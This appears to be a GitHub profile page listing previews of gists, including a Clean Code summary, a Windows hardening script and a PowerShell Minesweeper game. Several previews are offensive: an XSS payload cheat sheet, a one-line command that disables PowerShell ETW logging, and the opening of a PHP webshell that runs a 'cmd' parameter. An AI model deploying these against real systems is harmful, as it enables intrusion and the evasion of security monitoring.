Skip to content

Instantly share code, notes, and snippets.

View maravedi's full-sized avatar
🏒
Slappin' shots

maravedi

🏒
Slappin' shots
12 followers · 7 following
View GitHub Profile
@apolloclark
apolloclark / Buffer Overflow Tutorial in Kali.md
Last active January 21, 2026 02:33
Buffer overflow demonstration in Kali Linux, based on the Computerphile video
@wojteklu
wojteklu / clean_code.md
Last active January 31, 2026 15:19
Summary of 'Clean code' by Robert C. Martin

Code is clean if it can be understood easily – by everyone on the team. Clean code can be read and enhanced by a developer other than its original author. With understandability comes readability, changeability, extensibility and maintainability.

General rules

  1. Follow standard conventions.
  2. Keep it simple stupid. Simpler is always better. Reduce complexity as much as possible.
  3. Boy scout rule. Leave the campground cleaner than you found it.
  4. Always find root cause. Always look for the root cause of a problem.

Design rules

@kurobeats
kurobeats / xss_vectors.txt
Last active January 27, 2026 19:02
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@iwikmai
iwikmai / Get-MS17010.ps1
Last active December 22, 2023 05:50
<#
.Synopsis
Scans a host or network for the MS17-010 vulnerability and output results as a
table that you can pipe to other PowerShell functions such as Invoke-Command or
Export-CSV.
.DESCRIPTION
This script will use a custom NMap NSE script to scan a destination host on
port 445 for the MS17-010 vulnerability. If the host is not online or is blocking
@nikonthethird
nikonthethird / Minesweeper.ps1
Last active August 5, 2025 09:18
PowerShell Minesweeper
#Requires -Version 5.1
Using Assembly PresentationCore
Using Assembly PresentationFramework
Using Assembly WindowsBase
Using Namespace System.Collections.Generic
Using Namespace System.Collections.ObjectModel
Using Namespace System.Globalization
Using Namespace System.Reflection
Using Namespace System.Windows
@jessfraz
jessfraz / boxstarter.ps1
Last active November 15, 2025 02:44
Boxstarter Commands for a new Windows box.
# Description: Boxstarter Script
# Author: Jess Frazelle <[email protected]>
# Last Updated: 2017-09-11
#
# Install boxstarter:
# . { iwr -useb http://boxstarter.org/bootstrapper.ps1 } | iex; get-boxstarter -Force
#
# You might need to set: Set-ExecutionPolicy RemoteSigned
#
# Run this boxstarter by calling the following from an **elevated** command-prompt:
@tandasat
tandasat / KillETW.ps1
Last active August 22, 2025 06:28
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@mackwage
mackwage / windows_hardening.cmd
Last active December 18, 2025 15:32
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@joswr1ght
joswr1ght / easy-simple-php-webshell.php
Last active January 24, 2026 19:58
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active November 13, 2025 18:01
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#